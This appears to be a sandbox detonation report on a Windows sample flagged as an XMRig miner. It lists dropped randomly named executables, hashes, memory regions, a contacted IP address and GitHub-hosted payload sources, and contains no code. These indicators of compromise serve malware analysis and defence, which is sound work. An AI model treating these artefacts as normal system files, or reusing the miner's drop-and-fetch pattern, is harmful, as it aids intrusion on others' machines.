C:\Windows\System\lPrEDyk.exe

C:\Windows\System\lPrEDyk.exe

C:\Windows\System\vuAeFFt.exe

C:\Windows\System\vuAeFFt.exe

C:\Windows\System\XtVyfVZ.exe

C:\Windows\System\XtVyfVZ.exe

C:\Windows\System\ajRfbMe.exe

C:\Windows\System\ajRfbMe.exe

C:\Windows\System\mFHTsgp.exe

C:\Windows\System\mFHTsgp.exe

C:\Windows\System\zuznbJl.exe

C:\Windows\System\zuznbJl.exe

C:\Windows\System\IUAzLdw.exe

C:\Windows\System\IUAzLdw.exe

C:\Windows\System\NDABwHA.exe

C:\Windows\System\NDABwHA.exe

C:\Windows\System\YWrVxwE.exe

C:\Windows\System\YWrVxwE.exe

C:\Windows\System\SHSDPJX.exe

C:\Windows\System\SHSDPJX.exe

C:\Windows\System\yTzpXmu.exe

C:\Windows\System\yTzpXmu.exe

C:\Windows\System\GrRuKUe.exe

C:\Windows\System\GrRuKUe.exe

C:\Windows\System\hcujgKW.exe

C:\Windows\System\hcujgKW.exe

C:\Windows\System\ZtHeMPh.exe

C:\Windows\System\ZtHeMPh.exe

C:\Windows\System\eUExlHh.exe

C:\Windows\System\eUExlHh.exe

C:\Windows\System\zCSmmEJ.exe

C:\Windows\System\zCSmmEJ.exe

C:\Windows\System\TsaOkiQ.exe

C:\Windows\System\TsaOkiQ.exe

C:\Windows\System\mKhrAdq.exe

C:\Windows\System\mKhrAdq.exe

C:\Windows\System\UvGVpfz.exe

C:\Windows\System\UvGVpfz.exe

C:\Windows\System\clMQuEc.exe

C:\Windows\System\clMQuEc.exe

C:\Windows\System\EIWspgq.exe

C:\Windows\System\EIWspgq.exe

C:\Windows\System\VQECKnm.exe

C:\Windows\System\VQECKnm.exe

C:\Windows\System\rRhvIjL.exe

C:\Windows\System\rRhvIjL.exe

C:\Windows\System\HrMWAAU.exe

C:\Windows\System\HrMWAAU.exe

C:\Windows\System\PMnokSJ.exe

C:\Windows\System\PMnokSJ.exe

C:\Windows\System\atarXeQ.exe

C:\Windows\System\atarXeQ.exe

C:\Windows\System\Ynjozni.exe

C:\Windows\System\Ynjozni.exe

C:\Windows\System\DddZakD.exe

C:\Windows\System\DddZakD.exe

C:\Windows\System\odBAwJx.exe

C:\Windows\System\odBAwJx.exe

C:\Windows\System\FcSuGCx.exe

C:\Windows\System\FcSuGCx.exe

C:\Windows\System\VtNgSMd.exe

C:\Windows\System\VtNgSMd.exe

C:\Windows\System\BKwosZM.exe

C:\Windows\System\BKwosZM.exe

C:\Windows\System\kUaQtFw.exe

C:\Windows\System\kUaQtFw.exe

C:\Windows\System\yATWRbb.exe

C:\Windows\System\yATWRbb.exe

C:\Windows\System\DJWpajW.exe

C:\Windows\System\DJWpajW.exe

C:\Windows\System\WqifDYz.exe

C:\Windows\System\WqifDYz.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2948-1-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2948-0-0x00000000001F0000-0x0000000000200000-memory.dmp

\Windows\system\irSRCkL.exe

MD5 b968fe90080607c747a2bd1d5289b48f
SHA1 ad0fa8fd9dd57c15183c4139e399f6bb58b079c8
SHA256 e34776258cd89e6c11c48929b97fdccbd499c0306b5345c863cd75bec6738944
SHA512 8182f6458555944cb75c8cae6c1d1f53a6ca1937dc54d9582423674cd131044e5c1c2057fcc1f6f7278096a5d5edfffe7e078badd763646f3d93a3838655f7b5

memory/2036-9-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2888-14-0x000007FEF544E000-0x000007FEF544F000-memory.dmp

memory/2948-8-0x0000000002CD0000-0x00000000030C6000-memory.dmp

\Windows\system\kkKFWJp.exe

MD5 9df06f20d999e0d3cd0b9a797573e8c8
SHA1 d7cbfe7a0ca596390ff121cb35ad2ba102691f4f
SHA256 56fde57264fd3d04e882cde3ee4ad4c34a1bee35d779b4ec100bf9f018a3447d
SHA512 1f222620eefa2526bd770cc71ff7d1a98aca60a05b8a913bd349b493e42ca2ff4a97873a63a6f89b05a9fbb2701e5809e78f0998c4185e2ee7376ff49e2bea63

C:\Windows\system\TYvDrPt.exe

MD5 9e8e3ac249baa9fd4acafe1348d2e30c
SHA1 79e5d73a1834bcaec4ee4ab4003f5dee95087526
SHA256 4fb9bc049ed3d07c43f4df8f5ea438562aff598dc22b8b10e834fc667c777c60
SHA512 25bdb4d6858558edb1241da8f284cfc8ce50938072bd0fbb7709009919f0f124f05de0412f8e3e73fac51558395d569f7ed4a96b9b2c6dff17b6ad45da358315

C:\Windows\system\XdrViiL.exe

MD5 b06f79f7a2d4ad8c5ad76d6eae43ee39
SHA1 a8c2cb79b48eab5ffc274311da83df4f55ef8d39
SHA256 707f22ca48631c8734637ffb9c79f88c3c0684e8824b81e8e223ade06f5bb28a
SHA512 e47b3d38c97679e9cc2808c66afacde320d60ee208f3993f1371d629fd648c280bb5e0092f1b6ac680deddbcfd261b874eb181ff4ce5b0e5f17fb5600633a13d

\Windows\system\mchSqxr.exe

MD5 ca39cd39f8aa40dc2ac06c2251ac2fee
SHA1 ed5156b6211e1cb4b6ad3559513aff74f10e81e8
SHA256 75d15b3573ca35de1265ae8bf3f271d54243064c6692de67bd5b6c9ce9c34095
SHA512 526010de857dec03c3778f33ff63e22b5a6e0c7b77c3fe94e53c45f6ce7f1b84638bf01e18234a2c2975d0cfc98d862189dcefc2e3d1a5ad53089baf577e2244

memory/2888-35-0x000000001B260000-0x000000001B542000-memory.dmp

C:\Windows\system\rkFFehA.exe

MD5 7c16215dbf761e2b9b685f8b14a4f137
SHA1 2611999ebc0d71e374bbe5bd8c7b6c61c119c97a
SHA256 5c3ac8727c8fa6971f601499a374377ed5f671af6f57e306ab7de4a1201f8eb3
SHA512 a364b640ef3375542ec09343ea4a2b2e7c8323bddd86da8571b9435aee4470f171a699628b3b7f9b45cf2b1daf3341d712cb12973ee9f2c0f2f9513d853cb851

\Windows\system\TncckMg.exe

MD5 4f3fb4d874c4a25e36ec4eb213199823
SHA1 293c8e28d1e76e7111808eb1975216c7558df455
SHA256 978be8abe2c0a47499123a32f73bc8f6a95102e0ab52d7e048d7d152ba6f902a
SHA512 f055aad578c16808fc25efa64a768e2453cbae838bcd7d3aac7569df9f160d070cfedab7113033578f785c45f4f3ebd9428d7a848f830e43225ae87444297504

memory/2888-48-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

memory/2888-47-0x00000000025B0000-0x00000000025B8000-memory.dmp

C:\Windows\system\ebiekAd.exe

MD5 6521f2877a757f7c3d3582fddd80d3f0
SHA1 504e38fdf18ea3fca865fa7c29e361b6aaed895e
SHA256 92acb914fb0351bf63b2f2666617efc996e2d735f24bc3c733403ebc879e6f6f
SHA512 8d22c0c04fd13ae23d9ea2a29cb80fe817aa852ee54136ee902eaa82840e816988842336b176848d8fd698ab99a641778eea62f9ca9f8713047d9f0c70b174f1

memory/2948-70-0x000000013F060000-0x000000013F456000-memory.dmp

memory/2948-74-0x000000013F730000-0x000000013FB26000-memory.dmp

C:\Windows\system\pGXFpyC.exe

MD5 2cc158cd5c6a74e3fd49d2bd190d55bc
SHA1 8a232a8648aa3e67b7c7dab41afd032c8503b112
SHA256 5fecde8399f56a767adf03edfcba08527ea242e871bfa9b13c02ed7333fe57b3
SHA512 c8e4e5191f3dcca437da05568bfd90e11c122ac4853a17824fa9b64b079d3bf10c591dd6e2c723d865cdf8b16179b1beb174859d76194a7ab84e367925b446f0

memory/2948-102-0x0000000003250000-0x0000000003646000-memory.dmp

memory/2948-93-0x0000000003250000-0x0000000003646000-memory.dmp

C:\Windows\system\aVFcnyx.exe

MD5 754462f01f38ccd643e1ffd690d6e987
SHA1 61b9a74bc3d01ea5842cb5e504cb79c67aee4540
SHA256 ff206362faa6b9689069b20a0f788326588526f11b96365bd302fd69e4a447e4
SHA512 ee36c2b31c1595303b87d41d81038d70f3ddd72798a2a7870f90909b0d983d1ea91f0975e0c3ecc3f3614dd7f4e19387d086df50bcc0100df18861532b7044a8

memory/656-110-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/2988-111-0x000000013F330000-0x000000013F726000-memory.dmp

memory/2948-115-0x000000013F2D0000-0x000000013F6C6000-memory.dmp

memory/2520-114-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/2948-113-0x000000013F330000-0x000000013F726000-memory.dmp

memory/2888-112-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

memory/2736-109-0x000000013FBF0000-0x000000013FFE6000-memory.dmp

memory/2948-108-0x0000000003250000-0x0000000003646000-memory.dmp

memory/2388-107-0x000000013F2E0000-0x000000013F6D6000-memory.dmp

memory/2888-91-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

memory/3000-90-0x000000013F790000-0x000000013FB86000-memory.dmp

memory/2948-101-0x000000013F2E0000-0x000000013F6D6000-memory.dmp

memory/2948-100-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

C:\Windows\system\pADMXKh.exe

MD5 954a6a2dd8b06b3c5333a9ead6c39a4e
SHA1 0ba2f12496f8f5b2dffd7f340448b31b3c243d13
SHA256 da810edc056ba76076ef65c03d31ffd02acc7a7a0b6e55e9d09425552a4bfe0c
SHA512 6f34b5faf8fc3cff30646be8cceda5a805e1bf499439098cfb0d14fc197dae55f0e845f90cbaaf869068670460749cdbe7c8395b1c0acb1f7ec454ea903fb903

C:\Windows\system\liODnOH.exe

MD5 6873cc579d3f9077d0db4c6bd8c96691
SHA1 cc88a9c1a9f163ad3662c521cb5622dc1b1f7291
SHA256 7d8df3f92126cea8bf33b58273b23ce8366d8bb5a58dfd45c96f4a49181a2907
SHA512 7125286faf6fa7d4b6cbd5cb92217ed125007c8ca6bb415b408a80b54ff5f66439330e825b355d8b5d4961b1289704d278623bfa472fee802ce0a7b524ce784f

C:\Windows\system\xhXLLut.exe

MD5 a7d0c8fa9e28667649b799ee8e3c9164
SHA1 fcfc921c5c10e37c2e34f43c7b8c3458e0894801
SHA256 cdc564ab6f9fcc4278773d61df581a1843ae2bf3eb9e97de9d5ef68100fbc84a
SHA512 f5629cc094f42cf2165c60414b884e3e80faf8be7bdae33ba86feb8ca8fe1cbe6631fbaf6990906d5a105ea3f67f945dc59902b80c46222762bb6638e566a073

C:\Windows\system\PIhcqMP.exe

MD5 48e82653606702428d323eac8c722e5e
SHA1 5296e63c410d4079152a5fa5120f04253b46cc78
SHA256 08f816a691f3c4c39d633ef92b6842d80a3bb2b1624d1a496fbeea95bd760795
SHA512 c104c6774b677df6d6971aa1bb8c5269b67532e87fa435008c899c9e07c4becc5fab8231cac6c29c4425f061afee0b51ee1d78f629cf17fbfb50b1c74660fdd8

memory/2948-1967-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2948-2134-0x000000013F730000-0x000000013FB26000-memory.dmp

memory/2948-2374-0x0000000003250000-0x0000000003646000-memory.dmp

memory/2948-2376-0x0000000003250000-0x0000000003646000-memory.dmp

memory/2948-2355-0x0000000003250000-0x0000000003646000-memory.dmp

memory/2036-2661-0x000000013FD80000-0x0000000140176000-memory.dmp

memory/2620-2671-0x000000013F060000-0x000000013F456000-memory.dmp

memory/3000-2739-0x000000013F790000-0x000000013FB86000-memory.dmp

memory/2520-2757-0x000000013F6F0000-0x000000013FAE6000-memory.dmp

memory/656-2756-0x000000013FDC0000-0x00000001401B6000-memory.dmp

memory/2468-2755-0x000000013FF70000-0x0000000140366000-memory.dmp

memory/2736-2753-0x000000013FBF0000-0x000000013FFE6000-memory.dmp

memory/2388-2776-0x000000013F2E0000-0x000000013F6D6000-memory.dmp

memory/2988-2774-0x000000013F330000-0x000000013F726000-memory.dmp

memory/2884-2716-0x000000013F5F0000-0x000000013F9E6000-memory.dmp

memory/3028-2683-0x000000013F730000-0x000000013FB26000-memory.dmp

C:\Windows\system\Gxsseuv.exe

MD5 a14a7268280aa340ac1b0310dd3d4e36
SHA1 debc067e28cb045d73b979bafc0889a2bedf4a7c
SHA256 c239e16ad69211322f0a0d4d79c4db092c30c266e091e5c3f6b598336ac9b8da
SHA512 8cbcfa3684232743527e4ae3f390510f39c9c3dd2661daf5c46539aabae33cf53880f5e28f37280d5428e559293c108328510e05150a39ff05104fdf915539df

C:\Windows\system\kuuepro.exe

MD5 4f5fadd114670edc127cfdd3a6d204c8
SHA1 82ed6dfc404e364577648cc1340aba4f454f3ccb
SHA256 f7c76f152850b65f314ba88602a0216842343359c3503d64ef83b8c997edde7b
SHA512 55cfe707058fce07152624ff027ac6602dcaa23d45f82458c0e857372374ddbc7473c668e67b337bc054f4f57e63e162469be6e9e035f3f4c008297731fad69e

C:\Windows\system\JnwJCYH.exe

MD5 eb5fcde99c79e5b464c839a3fbc54b73
SHA1 b0dfc2c41f09b8f7a982326864400d16e9d1a74d
SHA256 b5daa30249fdd29f0cd16e92b2deaf3e9819a28307711f9ea07062b395b973cf
SHA512 3db786baf5006bd5cc6b1af66abc4e8b8832641805c2bb6a7cfc3b127461dfdd9ca7f6dc2b7607da07d95e0721221f95b0e38c709b6a9b906812cccb6a1d7813

C:\Windows\system\WxGwdfq.exe

MD5 9d2ab9dfd23347567cc2d98274de5dbb
SHA1 b721456c7c244f260a3028413f7baa868493a5b4
SHA256 e646a0623b2e415773a66bed8064ecd79856a01376b226fd159b7543a790edec
SHA512 ce0b69e61ba6c57bf32df3e9f4d7822d75937df059e295bf6b36503ebdc85a1de96e52217f699f29c5d6a00e97b7a48fea8ca24e177860d8e3d9fb441effceae

C:\Windows\system\sbwTaeW.exe

MD5 f04578112b14aaeea5ac80bd46af8348
SHA1 9002fd296bc1323429f1aec6b241a5f1e705926f
SHA256 58fc265243d1e47f2c90955520cdfaf556a29825e7dec08aee175d18b45660f0
SHA512 e38ffc54facc38ac05bb69dc30d7a6c032605e9cd36dbb647e91479ff1ebc34844b8644fe0724f4b8ab73104eff81d5c6df59ebffa4cb70008e49dafe40be0a9

\Windows\system\eeZfpMp.exe

MD5 79a01cb55022d5abc7d49aff0b7b7a9c
SHA1 ac77431cee7d5da8bd4f9fc9141eb2f26979deab
SHA256 2c2e6abcd7af69d805fbca1113a2a192f178fce1be22ce5d626d64de3cd76ff5
SHA512 6d5e7a40d54e8c407cf5f6ec8c9dd8b2006ba49c3b77753fa1953dffb0c8c75068e1d9d7246a6b24e3400a923979e7e00a1b699eac66bc108a8b06dacddfb2d4

C:\Windows\system\ryQIKFq.exe

MD5 4df9aadc2b849aa5f69b0dd8c3715bf4
SHA1 f2750971f93ed1ce34099bfdfbf6a7fb1fb7967c
SHA256 84ed60d752f8927bfe4e9ccc7236faa5afb92d966bdbc7e499cf0e7be69a6ba8
SHA512 a6f14a18e898c95240ac0d43ee7d450586ad6e9548ef62d6e3a3699c7aa268ad4a970981b977a0915c329af02c4400209ccc897210e6ac7824a95756a26bd4bd

C:\Windows\system\bxkijDZ.exe

MD5 f41b208fce82f269bbf5b5a1f3f8ee42
SHA1 016d3e02aae892aee423b63f8fd7e54eb5346f7e
SHA256 79d6535d84cff6d48306bc71fdfb639e8ec1319f9ad62ca05c49baa5a5ec44c4
SHA512 33b48b0edb7907e4bbedfa944f7cb45a0396c6937c6d01b30c8fd9150677f3879b1279345bad220cc1c33f8f4c51fe343d9817c68d0fe7556a8e6d38ffbef720

\Windows\system\dplevKF.exe

MD5 9873dc90a294d91f4f3313ba3d3782ef
SHA1 d8e9d4d3fe6320f403e304b4e5788de76d8d6431
SHA256 7b431a38b169ec72e4f67eb32d5da4cad36a94b220213ab33bc9c18c2374fb5a
SHA512 b88a336e7c3c2b663af299b0e7026e33ceef62d5f247455dcd7c06565f49653dd4d728b2848d84bf3d8c61d0ec6dd0b85811e4be7f97e24c2248eff89a2da95b

C:\Windows\system\majNrhl.exe

MD5 a21ffa08b178820bb4ba4f732e0a14ad
SHA1 ef1273976d1a76cdc557f95c4ed2ff489a1aa364
SHA256 448772b24977a030761cd832826daed1e9055e3980a0ca1762e3253ea3f46ad5
SHA512 6c01c0f9941cf766d52b5dd41bb796189153f656256b3f4071c6ea3ef8548f0c1eccd13ec72688602d8780b102582130793982a70715471f2b57ba709bf3906e

C:\Windows\system\OQkXzmm.exe

MD5 fc97985568905380e2c6f3a48b2717d1
SHA1 7d3fc0b43219f7b623b79cf2efa68eece78571c9
SHA256 7808f1b2450f99fd4f38c5b512f7dd5e1f38799764a02b0e622d8bf9e7fcc9bf
SHA512 5e846271e37032445eb61b0219b5f3ea11508cd2483335ee8ab06fea048d6aa72f561e6a19e80ba20647721bf237daacd11624f4ba14f098c7e83e35cbf4633f

memory/2888-122-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

C:\Windows\system\sqWcnnc.exe

MD5 11299d20786737f1cc3ed12b6ac88c0c
SHA1 eef8441af7ab272b6addc15e53d2b9259b6fafc5
SHA256 448cfd7d67a7e85633128c08040132f602557fe1b6c740f7d799fc2b9651d2cb
SHA512 cec4153f2bd8a4261f2475229b626394379716e84008f73de2930112954ab762249b799275193b0b5af3240d2660036a0446f2541cdf5a8d4acaf4365d675af1

memory/2468-99-0x000000013FF70000-0x0000000140366000-memory.dmp

C:\Windows\system\JfFVnfF.exe

MD5 95a912af87582791e26e4adbf9ac3cfb
SHA1 0dcb461a3b0c1e65645a112da6566d6d52b12042
SHA256 71a13ce8815fb12383cf980b50ddd4ae73a4de8573d55a99971f4e19a645be74
SHA512 4ae6c8d345ad7bbfe08cf8c198cfb5002a7d9066a9528a8fa09a2c1f6907aef6a6c60d031a519ccbbf247a0fbcdde8f7792bdc6be099a51ba5b102ffa7db022d

memory/2948-89-0x000000013F790000-0x000000013FB86000-memory.dmp

memory/2884-88-0x000000013F5F0000-0x000000013F9E6000-memory.dmp

memory/2948-86-0x000000013F5F0000-0x000000013F9E6000-memory.dmp

memory/3028-85-0x000000013F730000-0x000000013FB26000-memory.dmp

memory/2620-72-0x000000013F060000-0x000000013F456000-memory.dmp

C:\Windows\system\BxJvwKu.exe

MD5 5a464a775bf28fc0594e96d155e460fc
SHA1 c3af49762dd221534a581701b55731afbdd9d937
SHA256 dfb43327b5a8d99306b9c716e7f4434e4ed64af620292596a11019145bc24445
SHA512 56b0711308a816b7f9f345051571e8869baa732f75128da8184e8d0a4dfd50ee550ea95aff961a3c3dcf1702bb50a4f0c8cb7a46cfedd5bc0ad7fdeadbd8a45d

C:\Windows\system\RMAwFgU.exe

MD5 79fae7f0e1074f088033f2e48fc2037f
SHA1 eb35579dc1ffa82abacd763925b413d8899d2555
SHA256 27b4e5be03124fca076c03e1383eff9bb8de91883e8ed22518037add202a2efd
SHA512 d7d6543b613e451b17f6c2b1c734a3a3315aadb97306a8d310bd2c034985b1c95ea2b378714fdb5a319b6b847fee6672f3d95cb3919193c5fb5e254964c05598

C:\Windows\system\VQnuaGj.exe

MD5 8b596cc96cf7bfe2129b2d6f99659630
SHA1 b1ad6bbfd8b5de5d0fbe6c25c05b5ed46a75ebc0
SHA256 f5f5ea3372f92d14cb8a3d347f31c186d3dd8ac36185895fd2a022f2db1ab69b
SHA512 a3c05357da1de2951fd2adfa65093dfb293a61a533e9eeabbfa5451e63ed528f31426b6df7a7b18c7a844eb76e0d0a73989346a974a7170dc50eb47aaa3e4172

C:\Windows\system\NPLFdly.exe

MD5 e137b9d871aabaf6d53d041d68d8f531
SHA1 69cfb8ac9d4305e2c401124407607047f0319aab
SHA256 24f33f90f50785324016a96fc2fe65ce75fe7fb043dcbc140e0a87fcdc78fbaf
SHA512 8f435a6103c60ef532c949acdfdbd9f19afb183869df636434b5962096ce776de0f0afff28504b4a9859c70fe86dc6bffc0b9cb0816f5f28ba10f456d84f7b42

memory/2888-60-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

C:\Windows\system\CuRUnIK.exe

MD5 a31cf3850621cea7323bd5f2527df033
SHA1 974e3f3e138f0f8842e9484057896bfa7beb31a2
SHA256 bb58804f9cea4436b2f7641998d6b0c4b84f3a09e82334288f08af4d115f695b
SHA512 7c87e447c8a1f67cf9be6422e504875a79f11e04dcba43a3462d88288eeb2eed0d3bccef568a2bcebaf40135d32bd17fa97b7db5f2d67eafa1406c51b24f87a0

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 09:29

Reported

2024-06-12 09:31

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\OItciUL.exe N/A
N/A N/A C:\Windows\System\jwyxaOe.exe N/A
N/A N/A C:\Windows\System\eAlXBBG.exe N/A
N/A N/A C:\Windows\System\SASkSSk.exe N/A
N/A N/A C:\Windows\System\peAIgRU.exe N/A
N/A N/A C:\Windows\System\KdYGnOH.exe N/A
N/A N/A C:\Windows\System\mozikGz.exe N/A
N/A N/A C:\Windows\System\xiltYGg.exe N/A
N/A N/A C:\Windows\System\PcruerW.exe N/A
N/A N/A C:\Windows\System\ukjPsnF.exe N/A
N/A N/A C:\Windows\System\HtEeppC.exe N/A
N/A N/A C:\Windows\System\RkaTLDL.exe N/A
N/A N/A C:\Windows\System\enszcXd.exe N/A
N/A N/A C:\Windows\System\OkJsYRo.exe N/A
N/A N/A C:\Windows\System\YaKAOoP.exe N/A
N/A N/A C:\Windows\System\ztgcCnT.exe N/A
N/A N/A C:\Windows\System\Ulplwni.exe N/A
N/A N/A C:\Windows\System\rIIWHrs.exe N/A
N/A N/A C:\Windows\System\lTotpOg.exe N/A
N/A N/A C:\Windows\System\yfNNjbg.exe N/A
N/A N/A C:\Windows\System\qPmzhyd.exe N/A
N/A N/A C:\Windows\System\sbvCWoC.exe N/A
N/A N/A C:\Windows\System\wMkGpUg.exe N/A
N/A N/A C:\Windows\System\JwZwQqw.exe N/A
N/A N/A C:\Windows\System\PBUepdr.exe N/A
N/A N/A C:\Windows\System\CiOoxmx.exe N/A
N/A N/A C:\Windows\System\axQMDcr.exe N/A
N/A N/A C:\Windows\System\knpZHZg.exe N/A
N/A N/A C:\Windows\System\wFVmnam.exe N/A
N/A N/A C:\Windows\System\IRmpEsL.exe N/A
N/A N/A C:\Windows\System\LrbSXam.exe N/A
N/A N/A C:\Windows\System\DQRkYmL.exe N/A
N/A N/A C:\Windows\System\TIiRTUd.exe N/A
N/A N/A C:\Windows\System\XjgOwvY.exe N/A
N/A N/A C:\Windows\System\EPQTmVe.exe N/A
N/A N/A C:\Windows\System\akBxHIv.exe N/A
N/A N/A C:\Windows\System\rmsUOPH.exe N/A
N/A N/A C:\Windows\System\yByfLMa.exe N/A
N/A N/A C:\Windows\System\xysXhgw.exe N/A
N/A N/A C:\Windows\System\RxQFrzF.exe N/A
N/A N/A C:\Windows\System\zXREJLM.exe N/A
N/A N/A C:\Windows\System\ruaACot.exe N/A
N/A N/A C:\Windows\System\KBxToBQ.exe N/A
N/A N/A C:\Windows\System\ZmAXseT.exe N/A
N/A N/A C:\Windows\System\szyqmfl.exe N/A
N/A N/A C:\Windows\System\UcGndDg.exe N/A
N/A N/A C:\Windows\System\RpKkntC.exe N/A
N/A N/A C:\Windows\System\xyijXCw.exe N/A
N/A N/A C:\Windows\System\BKkGFEQ.exe N/A
N/A N/A C:\Windows\System\CXhclEA.exe N/A
N/A N/A C:\Windows\System\sosHzdy.exe N/A
N/A N/A C:\Windows\System\nNjPQKg.exe N/A
N/A N/A C:\Windows\System\lXXOnGM.exe N/A
N/A N/A C:\Windows\System\lmblIbw.exe N/A
N/A N/A C:\Windows\System\agtzoUj.exe N/A
N/A N/A C:\Windows\System\pzUqDPz.exe N/A
N/A N/A C:\Windows\System\LDRrcrV.exe N/A
N/A N/A C:\Windows\System\TYtBVtv.exe N/A
N/A N/A C:\Windows\System\CoNOCCo.exe N/A
N/A N/A C:\Windows\System\QFAUJaN.exe N/A
N/A N/A C:\Windows\System\HWbupuf.exe N/A
N/A N/A C:\Windows\System\gnfJvaa.exe N/A
N/A N/A C:\Windows\System\wXYeIXN.exe N/A
N/A N/A C:\Windows\System\OwFoqEH.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\UCBEWYh.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ePXJqWS.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\vfqzXsG.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\SCfUuwF.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\nXJAurc.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\VxOrlSp.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\CnfEvHA.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\JSxYAUM.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gtBkZOn.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\VXzkntI.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
